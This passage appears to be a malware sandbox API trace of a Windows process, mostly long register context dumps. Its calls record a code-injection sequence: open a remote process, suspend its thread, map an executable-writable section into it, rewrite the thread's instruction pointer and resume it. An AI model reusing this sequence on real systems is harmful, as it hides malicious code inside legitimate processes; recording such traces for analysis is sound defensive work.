Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x204000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x694717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.007] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0138.008] NtClose (Handle=0x1a0) returned 0x0 [0138.008] NtClose (Handle=0x1a4) returned 0x0 [0138.009] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x113c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0138.009] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0138.009] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0138.009] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x38e000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0138.009] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0138.014] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1140) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0138.014] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0138.014] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2690000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0138.037] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x38e000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.048] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0138.049] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x145200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x146000) returned 0x0 [0138.059] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x145200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xcd0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x146000) returned 0x0 [0138.081] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0138.088] NtClose (Handle=0x1a8) returned 0x0 [0138.088] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x38e000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xd82717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, 